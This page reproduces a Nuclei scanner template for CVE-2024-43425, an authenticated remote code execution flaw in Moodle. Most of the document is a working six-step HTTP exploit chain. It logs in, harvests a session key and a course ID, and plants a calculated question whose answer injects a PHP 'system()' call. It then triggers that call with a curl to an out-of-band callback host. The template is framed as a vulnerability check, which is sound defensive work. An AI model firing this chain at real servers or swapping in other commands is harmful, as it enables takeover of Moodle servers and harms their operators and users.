Moodle - Remote Code Execution
ID: CVE-2024-43425
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,moodile,rce,authenticated
Description
Section titled “Description”Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
YAML Source
Section titled “YAML Source”id: CVE-2024-43425
info: name: Moodle - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system. reference: - https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions - https://blog.redteam-pentesting.de/2024/moodle-rce/ - https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425 classification: cvss-score: 9.8 cve-id: CVE-2024-43425 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Moodle" product: moodle vendor: moodle tags: cve,cve2024,moodile,rce,authenticated
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)
http: - raw: - | GET /login/index.php HTTP/1.1 Host: {{Hostname}}
- | POST /login/index.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
anchor=&logintoken={{token}}&username={{username}}&password={{password}}
host-redirects: true
extractors: - type: regex part: body name: token group: 1 regex: - 'name="logintoken" value="([a-zA-Z0-9]+)">' internal: true
- raw: - | GET /my/courses.php HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex name: sesskey part: body internal: true group: 1 regex: - '"sesskey":"([^"]+)"' - raw: - | POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
[{"index":0,"methodname":"core_course_get_enrolled_courses_by_timeline_classification","args":{"offset":0,"limit":0,"classification":"all","sort":"fullname","customfieldname":"","customfieldvalue":"","requiredfields":["id","fullname","shortname","showcoursecategory","showshortname","visible","enddate"]}}]
extractors: - type: json part: body name: courseid json: - ".[].data.courses[0].id" internal: true
- raw: - | POST /question/bank/editquestion/question.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
initialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes
extractors: - type: regex part: header name: id group: 1 internal: true regex: - "&id=([0-9]+)&"
- raw: - | POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
id={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page
extractors: - type: regex part: header name: rceurl group: 1 internal: true regex: - "Location: https?://.*?/question/(.*)&returnurl"
- raw: - | GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http"
- type: status status: - 200# digest: 4a0a0047304502201105b86dfc1a25393cc0ddc654c5c243dae56e9165c61fa574ea7f99aac4b12a022100c27ab7913ee580efb114718edf59b30695c2c143bec660fa351bc1ec6a4e707a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-43425.yaml"